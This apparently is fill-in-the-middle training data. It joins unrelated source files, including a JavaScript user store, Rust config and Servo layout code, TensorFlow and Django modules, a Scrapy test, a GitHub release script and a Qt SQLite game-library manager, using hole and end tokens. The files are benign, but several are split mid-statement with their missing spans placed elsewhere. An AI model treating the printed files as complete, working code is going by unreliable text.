import {patterns} from '@ciscospark/common';
const usersByEmail = new WeakMap();
const usersById = new WeakMap();
<|fim▁hole|>/**
* @class
*/
export default class UserUUIDStore {
/**
* @constructs {UserUUIDStore}
*/
constructor() {
usersByEmail.set(this, new Map());
usersById.set(this, new Map());
}
/**
* Adds a user object to the store
* @param {Object} user
* @param {string} user.id
* @param {string} user.emailAddress
* @returns {Promise}
*/
add(user) {
if (!user.id) {
return Promise.reject(new Error('`user.id` is required'));
}
if (!user.emailAddress) {
return Promise.reject(new Error('`user.emailAddress` is required'));
}
if (!patterns.uuid.test(user.id)) {
return Promise.reject(new Error('`user.id` does not appear to be a uuid'));
}
if (!patterns.email.test(user.emailAddress)) {
return Promise.reject(new Error('`user.emailAddress` does not appear to be an email address'));
}
const p1 = this.getById(user.id)
.then((u) => usersById.get(this).set(user.id, Object.assign({}, u, user)))
.catch(() => usersById.get(this).set(user.id, Object.assign({}, user)));
const p2 = this.getByEmail(user.emailAddress)
.then((u) => usersByEmail.get(this).set(user.emailAddress, Object.assign({}, u, user)))
.catch(() => usersByEmail.get(this).set(user.emailAddress, Object.assign({}, user)));
return Promise.all([p1, p2]);
}
/**
* Retrievves the specified user object from the store
* @param {string} id
* @returns {Promise<Object>}
*/
get(id) {
if (patterns.uuid.test(id)) {
return this.getById(id);
}
if (patterns.email.test(id)) {
return this.getByEmail(id);
}
return Promise.reject(new Error('`id` does not appear to be a valid user identifier'));
}
/**
* Retrieves the specified user object by id from the store
* @param {Object} id
* @returns {Promise<Object>}
*/
getById(id) {
const ret = usersById.get(this).get(id);
if (ret) {
return Promise.resolve(ret);
}
return Promise.reject(new Error('No user found by specified id'));
}
/**
* Retrieves the specified user object by id from the store
* @param {Object} email
* @returns {Promise<Object>}
*/
getByEmail(email) {
const ret = usersByEmail.get(this).get(email);
if (ret) {
return Promise.resolve(ret);
}
return Promise.reject(new Error('No user found by specified email address'));
}
}<|fim▁end|>
| |
<|file_name|>mod.rs<|end_file_name|><|fim▁begin|>// Copyright (c) 2016 Tibor Benke <[email protected]>
//
// Licensed under the Apache License, Version 2.0
// <LICENSE-APACHE or http://www.apache.org/licenses/LICENSE-2.0> or the MIT
// license <LICENSE-MIT or http://opensource.org/licenses/MIT>, at your
// option. All files in the project carrying such notice may not be copied,
// modified, or distributed except according to those terms.
use uuid::Uuid;
use config::action::ActionType;
use conditions::Conditions;
mod deser;
pub mod action;
pub struct ContextConfig {
pub name: Option<String>,
pub uuid: Uuid,
pub conditions: Conditions,
pub context_id: Option<Vec<String>>,
pub actions: Vec<ActionType>,
pub patterns: Vec<String>
}
pub struct ContextConfigBuilder {
name: Option<String>,
uuid: Uuid,
conditions: Conditions,
context_id: Option<Vec<String>>,
actions: Vec<ActionType>,
patterns: Vec<String>
}
impl ContextConfigBuilder {
pub fn new(uuid: Uuid, conditions: Conditions) -> ContextConfigBuilder {
ContextConfigBuilder {
name: None,
uuid: uuid,
conditions: conditions,
context_id: None,
actions: Vec::new(),
patterns: Vec::new()
}
}
pub fn context_id(mut self, context_id: Option<Vec<String>>) -> ContextConfigBuilder {
self.context_id = context_id;
self
}
pub fn actions(mut self, actions: Vec<ActionType>) -> ContextConfigBuilder {
self.actions = actions;
self
}
pub fn name(mut self, name: String) -> ContextConfigBuilder {
self.name = Some(name);
self<|fim▁hole|> pub fn patterns(mut self, patterns: Vec<String>) -> ContextConfigBuilder {
self.patterns = patterns;
self
}
pub fn build(self) -> ContextConfig {
ContextConfig {
name: self.name,
uuid: self.uuid,
conditions: self.conditions,
context_id: self.context_id,
actions: self.actions,
patterns: self.patterns
}
}
}<|fim▁end|>
|
}
|
<|file_name|>feature_column_lib.py<|end_file_name|><|fim▁begin|># Copyright 2017 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,<|fim▁hole|># WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""FeatureColumns: tools for ingesting and representing features."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
# pylint: disable=unused-import,line-too-long,wildcard-import,g-bad-import-order
from tensorflow.python.feature_column.feature_column import *
from tensorflow.python.feature_column.feature_column_v2 import *
from tensorflow.python.feature_column.sequence_feature_column import *
from tensorflow.python.feature_column.serialization import *
# We import dense_features_v2 first so that the V1 DenseFeatures is the default
# if users directly import feature_column_lib.
from tensorflow.python.keras.feature_column.dense_features_v2 import *
from tensorflow.python.keras.feature_column.dense_features import *
from tensorflow.python.keras.feature_column.sequence_feature_column import *
# pylint: enable=unused-import,line-too-long<|fim▁end|>
| |
<|file_name|>authorActions.js<|end_file_name|><|fim▁begin|>import authorAPI from '../api/mock/mockAuthorAPI';
import * as types from './actionTypes';
import { beginAjaxCall } from './ajaxStatusActions';
const loadAuthorSuccess = (courses) => {<|fim▁hole|> return {type : types.LOAD_AUTHOR_SUCCESS, courses };
};
const loadAuthors = () => {
return (dispatch) => {
dispatch(beginAjaxCall());
return authorAPI.getAllAuthors().then(authors => {
dispatch(loadAuthorSuccess(authors));
}).catch(error => {
throw(error);
});
};
};
export {
loadAuthors,
loadAuthorSuccess
};<|fim▁end|>
| |
<|file_name|>stack-probes.rs<|end_file_name|><|fim▁begin|>// ignore-arm
// ignore-aarch64
// ignore-mips
// ignore-mips64
// ignore-powerpc
// ignore-powerpc64
// ignore-powerpc64le
// ignore-riscv64
// ignore-s390x
// ignore-sparc
// ignore-sparc64
// ignore-wasm
// ignore-emscripten
// ignore-windows
// compile-flags: -C no-prepopulate-passes
#![crate_type = "lib"]<|fim▁hole|>pub fn foo() {
// CHECK: @foo() unnamed_addr #0
}<|fim▁end|>
|
#[no_mangle]
|
<|file_name|>test_mincu_spider.py<|end_file_name|><|fim▁begin|># -*- coding: utf-8 -*-
import os
import unittest
from manolo_scraper.spiders.mincu import MincuSpider
from utils import fake_response_from_file
class TestMincuSpider(unittest.TestCase):
def setUp(self):
self.spider = MincuSpider()
def test_parse_item(self):
filename = os.path.join('data/mincu', '18-08-2015.html')
items = self.spider.parse(fake_response_from_file(filename, meta={'date': u'18/08/2015'}))
item = next(items)
self.assertEqual(item.get('full_name'), u'INGRID BARRIONUEVO ECHEGARAY')
self.assertEqual(item.get('time_start'), u'16:40')
self.assertEqual(item.get('institution'), u'mincu')
self.assertEqual(item.get('id_document'), u'DNI')
self.assertEqual(item.get('id_number'), u'10085172')
self.assertEqual(item.get('entity'), u'PARTICULAR')
self.assertEqual(item.get('reason'), u'REUNIÓN DE TRABAJO')
self.assertEqual(item.get('host_name'), u'JOIZ ELIZABETH DOBLADILLO ORTIZ')
self.assertEqual(item.get('title'), u'[SERVICIOS DE UN ASISTENTE EN COMUNICACIONES]')<|fim▁hole|> self.assertEqual(item.get('time_end'), u'16:53')
self.assertEqual(item.get('date'), u'2015-08-18')
number_of_items = 1 + sum(1 for x in items)
self.assertEqual(number_of_items, 15)<|fim▁end|>
|
self.assertEqual(item.get('office'), u'QHAPAQ ÑAN')
|
<|file_name|>__init__.py<|end_file_name|><|fim▁begin|>"""Base command for search-related management commands."""
from __future__ import annotations
import argparse
import builtins
import logging
from typing import Any, Optional, Union
from django.core.management.base import BaseCommand
from elasticsearch.exceptions import TransportError
CommandReturnType = Optional[Union[list, dict]]
logger = logging.getLogger(__name__)
class BaseSearchCommand(BaseCommand):
"""Base class for commands that interact with the search index."""
description = "Base search command."
<|fim▁hole|> """Return True if the user confirms the action."""
msg = "Are you sure you wish to continue? [y/N] "
return builtins.input(msg).lower().startswith("y")
def add_arguments(self, parser: argparse.ArgumentParser) -> None:
"""Add default base options of --noinput and indexes."""
parser.add_argument(
"-f",
"--noinput",
action="store_false",
dest="interactive",
default=True,
help="Do no display user prompts - may affect data.",
)
parser.add_argument(
"indexes", nargs="*", help="Names of indexes on which to run the command."
)
def do_index_command(self, index: str, **options: Any) -> CommandReturnType:
"""Run a command against a named index."""
raise NotImplementedError()
def handle(self, *args: Any, **options: Any) -> None:
"""Run do_index_command on each specified index and log the output."""
for index in options.pop("indexes"):
try:
data = self.do_index_command(index, **options)
except TransportError as ex:
logger.warning("ElasticSearch threw an error: %s", ex)
data = {"index": index, "status": ex.status_code, "reason": ex.error}
except FileNotFoundError as ex:
logger.warning("Mapping file not found: %s", ex)
data = {
"index": index,
"status": "N/A",
"reason": "Mapping file not found",
}
except Exception as ex: # noqa: B902
logger.warning("Error running command: %s", ex)
data = {
"index": index,
"status": "N/A",
"reason": str(ex),
}
finally:
logger.info(data)<|fim▁end|>
|
def _confirm_action(self) -> bool:
|
<|file_name|>rpc.rs<|end_file_name|><|fim▁begin|>/* This Source Code Form is subject to the terms of the Mozilla Public
* License, v. 2.0. If a copy of the MPL was not distributed with this
* file, You can obtain one at http://mozilla.org/MPL/2.0/. */
use app_units::Au;
use euclid::{Point2D, Rect};
use script_traits::UntrustedNodeAddress;
use servo_arc::Arc;
use style::properties::ComputedValues;
use style::properties::longhands::overflow_x;
use webrender_api::ExternalScrollId;
/// Synchronous messages that script can send to layout.
///
/// In general, you should use messages to talk to Layout. Use the RPC interface
/// if and only if the work is
///
/// 1) read-only with respect to LayoutThreadData,
/// 2) small,
/// 3) and really needs to be fast.
pub trait LayoutRPC {
/// Requests the dimensions of the content box, as in the `getBoundingClientRect()` call.
fn content_box(&self) -> ContentBoxResponse;
/// Requests the dimensions of all the content boxes, as in the `getClientRects()` call.
fn content_boxes(&self) -> ContentBoxesResponse;
/// Requests the geometry of this node. Used by APIs such as `clientTop`.
fn node_geometry(&self) -> NodeGeometryResponse;
/// Requests the scroll geometry of this node. Used by APIs such as `scrollTop`.
fn node_scroll_area(&self) -> NodeGeometryResponse;
/// Requests the scroll id of this node. Used by APIs such as `scrollTop`
fn node_scroll_id(&self) -> NodeScrollIdResponse;
/// Query layout for the resolved value of a given CSS property
fn resolved_style(&self) -> ResolvedStyleResponse;
fn offset_parent(&self) -> OffsetParentResponse;
/// Requests the styles for an element. Contains a `None` value if the element is in a `display:
/// none` subtree.
fn style(&self) -> StyleResponse;
fn text_index(&self) -> TextIndexResponse;
/// Requests the list of nodes from the given point.
fn nodes_from_point_response(&self) -> Vec<UntrustedNodeAddress>;
/// Query layout to get the inner text for a given element.
fn element_inner_text(&self) -> String;
}
pub struct ContentBoxResponse(pub Option<Rect<Au>>);
pub struct ContentBoxesResponse(pub Vec<Rect<Au>>);
pub struct NodeGeometryResponse {
pub client_rect: Rect<i32>,
}
pub struct NodeOverflowResponse(pub Option<Point2D<overflow_x::computed_value::T>>);
pub struct NodeScrollIdResponse(pub ExternalScrollId);
pub struct ResolvedStyleResponse(pub String);
#[derive(Clone)]
pub struct OffsetParentResponse {
pub node_address: Option<UntrustedNodeAddress>,
pub rect: Rect<Au>,<|fim▁hole|> pub fn empty() -> OffsetParentResponse {
OffsetParentResponse {
node_address: None,
rect: Rect::zero(),
}
}
}
#[derive(Clone)]
pub struct StyleResponse(pub Option<Arc<ComputedValues>>);
#[derive(Clone)]
pub struct TextIndexResponse(pub Option<usize>);<|fim▁end|>
|
}
impl OffsetParentResponse {
|
<|file_name|>create_general_release.py<|end_file_name|><|fim▁begin|>#!/usr/bin/env python
# (c) Copyright IBM Corp. 2021
# (c) Copyright Instana Inc. 2020
# Script to make a new python-sensor release on Github
# Requires the Github CLI to be installed and configured: https://github.com/cli/cli
import os
import sys
import distutils.spawn
from subprocess import check_output
if len(sys.argv) != 2:
raise ValueError('Please specify the version to release. e.g. "1.27.1"')
if sys.argv[1] in ['-h', '--help']:
filename = os.path.basename(__file__)
print("Usage: %s <version number>" % filename)
print("Exampe: %s 1.27.1" % filename)
print("")
print("This will create a release on Github such as:")
print("https://github.com/instana/python-sensor/releases/tag/v1.27.1")
# Check requirements first
for cmd in ["gh"]:
if distutils.spawn.find_executable(cmd) is None:
print("Can't find required tool: %s" % cmd)
sys.exit(1)
version = sys.argv[1]
semantic_version = 'v' + version
title = version
body = """
This release includes the following fixes & improvements:
*
Available on PyPI:
https://pypi.python.org/pypi/instana/%s
""" % version
<|fim▁hole|> "-R", "instana/python-sensor",
"-t", semantic_version,
"-n", body])
print("If there weren't any failures, the draft release is available at:")
print(response.strip().decode())<|fim▁end|>
|
response = check_output(["gh", "release", "create", semantic_version,
"-d", # draft
|
<|file_name|>dbmanager.cpp<|end_file_name|><|fim▁begin|>#include "dbmanager.h"
//=============================================================================================================================
//=================================================CONSTUCTOR==================================================================
//=============================================================================================================================
DbManager::DbManager(const QString& db_name)
/*Provided the database path db_name, it constructs the database and creates the file if it doesnt exist according
to these standards :
- Table game containing games
- Table platform containing platforms
- Table emulator containing emulators
*/
{
QSqlDatabase db = QSqlDatabase::database();
if(db.connectionName()=="")
{
initDb(db_name);
}
else
{
m_db = db;
qDebug(qUtf8Printable("Db:nice"));
}
}
void DbManager::initDb(const QString& db_name)
{
m_db = QSqlDatabase::addDatabase("QSQLITE");
m_db.setDatabaseName(db_name);
m_db.open();
m_db_name = db_name;
QSqlQuery query1;
query1.exec("create table if not exists game ("
"id integer primary key, "
"game_title varchar(1000), "
"platform varchar(1000), "
"emulator_name varchar(1000), "
"path varchar(1000), "
"release_date varchar(100), "
"image BLOB, "
"game_info text, "
"time_played integer, "
"last_played text, "
"game_favorited integer, "
"state text, "
"game_steam integer,"
"steamid integer,"
"opened_counter integer)");
QSqlQuery query2;
query2.exec("create table if not exists platform ("
"platform varchar(1000) primary key, "
"emulator_name varchar(1000), "
"image BLOB, "
"platform_info text, "
"time_played integer, "
"last_played text,"
"game_counter integer,"
"opened_counter integer)");
QSqlQuery query3;
query3.exec("create table if not exists emulator ("
"emulator_name varchar(1000) primary key, "
"image BLOB, "
"path varchar(1000), "
"emulator_info text, "
"time_played integer, "
"last_played text,"
"opened_counter integer)");
QSqlQuery query4;
query4.exec("create table if not exists extsoft ("
"software_name varchar(1000) primary key,"
"image BLOB,"
"path varchar(1000),"
"supported_extsoft integer,"
"multi_instance integer,"
"opened_counter integer,"
"games_off_list text,"
"games_whitelist text,"
"platforms_on_list text)");
}
void DbManager::close()
{
m_db.close();
}
void DbManager::setDatabaseName(const QString& path)
{
m_db.setDatabaseName(path);
}
bool DbManager::checkAddGamePossible(int id)
{
bool success = false;
QSqlQuery query;
query.prepare("SELECT EXISTS(SELECT 1 FROM game WHERE id=:id LIMIT 1);");
query.bindValue(":id",id);
if(query.exec())
{
while (query.next())
{
success = query.value(0).toBool();
success = !success;
}
}
else
{
qDebug() << "checkAddGamePossible error: " << query.lastError().text();
}
return success;
}
bool DbManager::checkAddExternalSoftwarePossible(QString externalSoftwareName)
{
bool success = false;
QSqlQuery query;
query.prepare("SELECT EXISTS(SELECT 1 FROM extsoft WHERE software_name=:software_name LIMIT 1);");
query.bindValue(":software_name",externalSoftwareName);
if(query.exec())
{
while (query.next())
{
success = query.value(0).toBool();
success = !success;
}
}
else
{
qDebug() << "checkAddExternalSoftwareEntry error: " << query.lastError().text();
}
return success;
}
//=============================================================================================================================
//=================================================GAME TABLE OPERATIONS=======================================================
//=============================================================================================================================
bool DbManager::addGameEntry(int id, QString gameTitle, QString platform, int steamid)
/*Provided a game, this function adds it to the game table.
*/
{
bool success = false;
QSqlQuery query;
query.prepare("INSERT INTO game (id,game_title,platform,time_played,steamid,opened_counter,state,last_played) VALUES(:id,:game_title,:platform,:time_played,:steamid,:opened_counter,:state,:last_played)");
query.bindValue(":id",id);
query.bindValue(":game_title",gameTitle);
query.bindValue(":platform",platform);
query.bindValue(":time_played",0);
query.bindValue(":steamid",steamid);
query.bindValue(":opened_counter",0);
query.bindValue(":state","");
query.bindValue(":last_played","");
if(query.exec())
{
success = true;
}
else
{
qDebug() << "addGameEntry error: " << query.lastError().text();
}
return success;
}
bool DbManager::deleteGameEntry(int id)
/*Provided a game id, this function removes it from the game table(and therefore from the database).
*/
{
bool success = false;
QSqlQuery query;
query.prepare("DELETE FROM game WHERE id = :id;");
query.bindValue(":id",id);
if(query.exec())
{
success = true;
}
else
{
qDebug() << "deleteGameEntry error: " << query.lastError().text();
}
return success;
}
//=============================================================================================================================
//=================================================GET OPERATIONS==============================================================
//=============================================================================================================================
QList<int> DbManager::getAllGames()
{
QList<int> AllGames;
QSqlQuery query;
query.prepare("SELECT id FROM game;");
if(query.exec())
{
while (query.next())
{
AllGames.append(query.value(0).toInt());
}
}
else
{
qDebug() << "getAllGames error: " << query.lastError().text();
}
return AllGames;
}
int DbManager::getGameId(QString gameTitle, QString platform)
/*Provided a game_title and platform, this function returns its id.
*/
{
int id(-1);
QSqlQuery query;
query.prepare("SELECT id FROM game WHERE game_title=:game_title AND platform=:platform;");
query.bindValue(":game_title",gameTitle);
query.bindValue(":platform",platform);
if(query.exec())
{
while (query.next())
{
id = query.value(0).toInt();
qDebug(qUtf8Printable(QString::number(id)));
}
}
else
{
qDebug() << "getGameId error: " << query.lastError().text();
}
return id;
}
int DbManager::getGameSteamId(QString gameTitle, QString platform)
{
/*Provided a game_title and platform, this function returns its id.
*/
int steamid(-1);
QSqlQuery query;
query.prepare("SELECT steamid FROM game WHERE game_title=:game_title AND platform=:platform;");
query.bindValue(":game_title",gameTitle);
query.bindValue(":platform",platform);
if(query.exec())
{
while (query.next())
{
steamid = query.value(0).toInt();
qDebug(qUtf8Printable(QString::number(steamid)));
}
}
else
{
qDebug() << "getGameSteamId error: " << query.lastError().text();
}
return steamid;
}
QString DbManager::getGameTitle(int id)
/*Provided a game id, this function returns its game_title.
*/
{
QString gameTitle("");
QSqlQuery query;
query.prepare("SELECT game_title FROM game WHERE id=:id;");
query.bindValue(":id",id);
if(query.exec())
{
while (query.next())
{
gameTitle = query.value(0).toString();
qDebug(qUtf8Printable(gameTitle));
}
}
else
{
qDebug() << "getGameTitle error: " << query.lastError().text();
}
return gameTitle;
}
QString DbManager::getGamePlatform(int id)
/*Provided a game id, this function returns its platform.
*/
{
QString platform("");
QSqlQuery query;
query.prepare("SELECT platform FROM game WHERE id=:id;");
query.bindValue(":id",id);
if(query.exec())
{
while (query.next())
{
platform = query.value(0).toString();
qDebug(qUtf8Printable(platform));
}
}
else
{
qDebug() << "getGamePlatform error: " << query.lastError().text();
}
return platform;
}
QString DbManager::getGamePath(int id)
/*Provided a game id, this function returns its path.
*/
{
QString path("");
QSqlQuery query;
query.prepare("SELECT path FROM game WHERE id=:id;");
query.bindValue(":id",id);
if(query.exec())
{
while (query.next())
{
path = query.value(0).toString();
qDebug(qUtf8Printable(path));
}
}
else
{
qDebug() << "getGamePath error: " << query.lastError().text();
}
return path;
}
QByteArray DbManager::getGameImage(int id)
/*Provided a game id, this function returns its image byte array.
*/
{
QByteArray gameImage;
QSqlQuery query;
query.prepare("SELECT image FROM game WHERE id=:id;");
query.bindValue(":id",id);
if(query.exec())
{
while (query.next())
{
gameImage = query.value(0).toByteArray();
}
}
else
{
qDebug() << "getGameImage error: " << query.lastError().text();
}
return gameImage;
}
QString DbManager::getGameInfo(int id)
/*Provided a game id, this function returns its game_info.
*/
{
QString game_info("");
QSqlQuery query;
query.prepare("SELECT game_info FROM game WHERE id=:id;");
query.bindValue(":id",id);
if(query.exec())
{
while (query.next())
{
game_info = query.value(0).toString();
qDebug(qUtf8Printable(game_info));
}
}
else
{
qDebug() << "getGameInfo error: " << query.lastError().text();
}
return game_info;
}
QString DbManager::getGameEmulator(int id)
/*Provided a game id, this function returns its emulator_name.
*/
{
QString emulatorName("");
QSqlQuery query;
query.prepare("SELECT emulator_name FROM game WHERE id=:id;");
query.bindValue(":id",id);
if(query.exec())
{
while (query.next())
{
emulatorName = query.value(0).toString();
qDebug(qUtf8Printable(emulatorName));
}
}
else
{
qDebug() << "getGameEmulator error: " << query.lastError().text();
}
return emulatorName;
}
QString DbManager::getGameReleaseDate(int id)
/*Provided a game id, this function returns its release_date.
*/
{
QString releaseDate("");
QSqlQuery query;
query.prepare("SELECT release_date FROM game WHERE id=:id;");
query.bindValue(":id",id);
if(query.exec())
{
while (query.next())
{
releaseDate = query.value(0).toString();
qDebug(qUtf8Printable(releaseDate));
}
}
else
{
qDebug() << "getGameReleaseDate error: " << query.lastError().text();
}
return releaseDate;
}
int DbManager::getGameTimePlayed(int id)
/*Provided a game id, this function returns its time_played.
*/
{
int time = -1;
QSqlQuery query;
query.prepare("SELECT time_played FROM game WHERE id=:id;");
query.bindValue(":id",id);
if(query.exec())
{
while (query.next())
{
time = query.value(0).toInt();
qDebug(qUtf8Printable("time played on database : "+QString::number(time)));
}
}
else
{
qDebug() << "getGameTimePlayed error: " << query.lastError().text();
}
return time;
}
QString DbManager::getGameLastPlayed(int id)
/*Provided a game id, this function returns its last_played.
*/
{
QString lastPlayed("Never Played");
QSqlQuery query;
query.prepare("SELECT last_played FROM game WHERE id=:id;");
query.bindValue(":id",id);
if(query.exec())
{
while (query.next())
{
lastPlayed = query.value(0).toString();
qDebug(qUtf8Printable(lastPlayed));
}
}
else
{
qDebug() << "getGameLastPlayed error: " << query.lastError().text();
}
qDebug(qUtf8Printable("debug20"));
return lastPlayed;
}
int DbManager::getGameOpenedCounter(int id)
{
int openedCounter=-1;
QSqlQuery query;
query.prepare("SELECT opened_counter FROM game WHERE id=:id;");
query.bindValue(":id",id);
if(query.exec())
{
while (query.next())
{
openedCounter = query.value(0).toInt();
qDebug(qUtf8Printable(QString::number(openedCounter)));
}
}
else
{
qDebug() << "getGameOpenedCounter error: " << query.lastError().text();
}
return openedCounter;
}
QString DbManager::getGameState(int id)
{
QString state("");
QSqlQuery query;
query.prepare("SELECT state FROM game WHERE id=:id;");
query.bindValue(":id",id);
if(query.exec())
{
while (query.next())
{
state = query.value(0).toString();
}
}
else
{
qDebug() << "getGameState error: " << query.lastError().text();
}
return state;
}
QDateTime DbManager::stringToDate(QString dateString)
{
qDebug(qUtf8Printable("debug21"));
if (dateString==""||dateString=="Never Played")
{
return QDateTime();
}
qDebug(qUtf8Printable(dateString));
QStringList yyyymmddPLUShhmmss = dateString.split(" ");
qDebug(qUtf8Printable("debug22"));
QString yyyymmddstring = yyyymmddPLUShhmmss.at(0);
QString hhmmssstring = yyyymmddPLUShhmmss.at(1);
qDebug(qUtf8Printable("debug23"));
QStringList yyyymmdd = yyyymmddstring.split("-");
QStringList hhmmss = hhmmssstring.split(":");
qDebug(qUtf8Printable("debug24"));
QDateTime date;
QString year = yyyymmdd.at(0);
qDebug(qUtf8Printable("debug30"));
QString month = yyyymmdd.at(1);
qDebug(qUtf8Printable("debug25"));
QString days = yyyymmdd.at(2);
qDebug(qUtf8Printable("debug26"));
QString hours = hhmmss.at(0);
QString minutes = hhmmss.at(1);
qDebug(qUtf8Printable("debug27"));
QString seconds = hhmmss.at(2);
qDebug(qUtf8Printable("debug28"));
date.setDate(QDate(year.toInt(),month.toInt(),days.toInt()));
date.setTime(QTime(hours.toInt(),minutes.toInt(),seconds.toInt()));
return date;
}
//=============================================================================================================================
//=================================================SET OPERATIONS==============================================================
//=============================================================================================================================
bool DbManager::setGameImage(int id, QByteArray imageData)
//Provided a game id and image data, this function sets the game image.
{
bool success = false;
QSqlQuery query;
query.prepare("UPDATE game SET image=:image WHERE id=:id;");
query.bindValue(":image",imageData);
query.bindValue(":id",id);
if(query.exec())
{
success = true;
}
else
{
qDebug() << "setGameImage error: " << query.lastError().text();
}
return success;
}
bool DbManager::setGameInfo(int id, QString gameInfo)
//Provided a game id and game_info, this function sets the game_info.
{
bool success = false;
QSqlQuery query;
query.prepare("UPDATE game SET game_info=:game_info WHERE id=:id;");
query.bindValue(":game_info",gameInfo);
query.bindValue(":id",id);
if(query.exec())
{
success = true;
}
else
{
qDebug() << "setGameInfo error: " << query.lastError().text();
}
return success;
}
bool DbManager::setGamePath(int id, QString gamePath)
//Provided a game id and game_path, this function sets the game_path.
{
bool success = false;
QSqlQuery query;
query.prepare("UPDATE game SET path=:path WHERE id=:id;");
query.bindValue(":path",gamePath);
query.bindValue(":id",id);
if(query.exec())
{
success = true;
}
else
{
qDebug() << "setGamePath error: " << query.lastError().text();
}
return success;
}
bool DbManager::setGameTimePlayed(int id, int timePlayed)
//Provided a game id and timePlayed, this function sets the time_played.
{
bool success = false;
QSqlQuery query;
query.prepare("UPDATE game SET time_played=:time_played WHERE id=:id;");
query.bindValue(":time_played",timePlayed);
query.bindValue(":id",id);
if(query.exec())
{
success = true;
}
else
{
qDebug() << "setGameTimePlayed error: " << query.lastError().text();
}
return success;
}
bool DbManager::updateGameLastPlayed(int id)
{
bool success = false;
QString date("");
QSqlQuery query1,query2;
query1.prepare("SELECT DATETIME('now','localtime');");
query2.prepare("UPDATE game SET last_played=:last_played WHERE id=:id;");
if(query1.exec())
{
while(query1.next())
{
date = query1.value(0).toString();
}
}
else
{
qDebug() << "updateGameLastPlayed error : " << query1.lastError().text();
return success;
}
if (date == "")
{
return success;
}
query2.bindValue(":last_played",date);
query2.bindValue(":id",id);
if(query2.exec())
{
success = true;
}
else
{
qDebug() << "updateGameLastPlayed error : " << query2.lastError().text();
}
return success;
}
bool DbManager::setGameState(int id, QString state)
{
bool success = false;
QSqlQuery query;
query.prepare("UPDATE game SET state=:state WHERE id=:id;");
query.bindValue(":state",state);
query.bindValue(":id",id);
if(query.exec())
{
success = true;
}
else
{
qDebug() << "setGameState error: " << query.lastError().text();
}
return success;
}
bool DbManager::setGameOpenedCounter(int id, int openedCounter)
//Provided a game id and timePlayed, this function sets the time_played.
{
bool success = false;
QSqlQuery query;
query.prepare("UPDATE game SET opened_counter=:opened_counter WHERE id=:id;");
query.bindValue(":opened_counter",openedCounter);
query.bindValue(":id",id);
if(query.exec())
{
success = true;
}
else
{
qDebug() << "setGameOpenedCounter error: " << query.lastError().text();
}
return success;
}
//=============================================================================================================================
//=================================================PLATFORM TABLE OPERATIONS===================================================
//=============================================================================================================================
QString DbManager::PlatformToSupportedEmulator(QString platform)
{
if (platform=="Nintendo Entertainment System (NES)")
{
return "nestopia";
}
else if (platform=="Super Nintendo (SNES)")
{
return "snes9x";
}
else if (platform=="Nintendo 64")
{
return "Project64";
}
else if (platform=="Nintendo GameCube"||platform=="Nintendo Wii")
{
return "Dolphin";
}
else if (platform=="Nintendo Wii U")
{
return "Cemu";
}
else if (platform=="Nintendo Game Boy"||platform=="Nintendo Game Boy Color"||platform =="Nintendo Game Boy Advance")
{
return "VisualBoyAdvance";
}
else if (platform=="Nintendo DS")
{
return "DeSmuME";
}
else if (platform=="Nintendo 3DS")
{
return "citra";
}
else if (platform=="Sony Playstation")
{
return "ePSXe";
}
else if (platform=="Sony Playstation 2")
{
return "pcsx2";
}
else if (platform=="Sony Playstation 3")
{
return "rpcs3";
}
else if (platform=="Sony Playstation Portable")
{
return "PPSSPP";
}
else if (platform=="PC")
{
return "PC";
}
return platform;
}
QStringList DbManager::SupportedEmulatorToPlatforms(QString emulatorName)
{
QStringList platforms;
if (emulatorName=="nestopia")
{
platforms.append("Nintendo Entertainment System (NES)");
}
else if (emulatorName=="snes9x")
{
platforms.append("Super Nintendo (SNES)");
}
else if (emulatorName=="Project64")
{
platforms.append("Nintendo 64");
}
else if (emulatorName=="Dolphin")
{
platforms.append("Nintendo GameCube");
platforms.append("Nintendo Wii");
}
else if (emulatorName=="Cemu")
{
platforms.append("Nintendo Wii U");
}
else if (emulatorName=="VisualBoyAdvance")
{
platforms.append("Nintendo Game Boy");
platforms.append("Nintendo Game Boy Color");
platforms.append("Nintendo Game Boy Advance");
}
else if (emulatorName=="DeSmuME")
{
platforms.append("Nintendo DS");
}
else if (emulatorName=="citra")
{
platforms.append("Nintendo 3DS");
}
else if (emulatorName=="ePSXe")
{
platforms.append("Sony Playstation");
}
else if (emulatorName=="pcsx2")
{
platforms.append("Sony Playstation 2");
}
else if (emulatorName=="rpcs3")
{
platforms.append("Sony Playstation 3");
}
else if (emulatorName=="PPSSPP")
{
platforms.append("Sony Playstation Portable");
}
return platforms;
}
bool DbManager::addPlatformEntry(QString platform)
/*Provided a platform, this function adds it to the platform table.
*/
{
bool success = false;
QSqlQuery query;
query.prepare("INSERT INTO platform (platform,game_counter,opened_counter) VALUES (:platform,:game_counter,:opened_counter)");
query.bindValue(":platform",platform);
query.bindValue(":game_counter",0);
query.bindValue(":opened_counter",0);
if(query.exec())
{
success = true;
}
else
{
qDebug() << "addPlatformEntry error: " << query.lastError().text();
}
setPlatformEmulator(platform,PlatformToSupportedEmulator(platform));
return success;
}
bool DbManager::deletePlatformEntry(QString platform)
/*Provided a platform name, this function removes it from the platform table(and therefore from the database).
*/
{
bool success = false;
QSqlQuery query;
query.prepare("DELETE FROM platform WHERE platform = :platform;");
query.bindValue(":platform",platform);
if(query.exec())
{
success = true;
}
else
{
qDebug() << "deletePlatformEntry error: " << query.lastError().text();
}
return success;
}
bool DbManager::incrementPlatformGameCounter(QString platform, bool plus)
//Provided a platform, increments its game_counter by 1.
{
bool success = false;
QSqlQuery query;
query.prepare("UPDATE platform SET game_counter=:game_counter WHERE platform=:platform;");
if (plus)
{
query.bindValue(":game_counter",getPlatformGameCounter(platform)+1);
}
else
{
query.bindValue(":game_counter",getPlatformGameCounter(platform)-1);
}
query.bindValue(":platform",platform);
if(query.exec())
{
success = true;
}
else
{
qDebug() << "incrementPlatformGameCounter error: " << query.lastError().text();
}
return success;
}
QStringList DbManager::getAllPlatforms()
{
QStringList allPlatforms;
QSqlQuery query;
query.prepare("SELECT platform FROM platform;");
if(query.exec())
{
while (query.next())
{
allPlatforms.append(query.value(0).toString());
}
}
else
{
qDebug() << "getAllPlatforms error: " << query.lastError().text();
}
return allPlatforms;
}
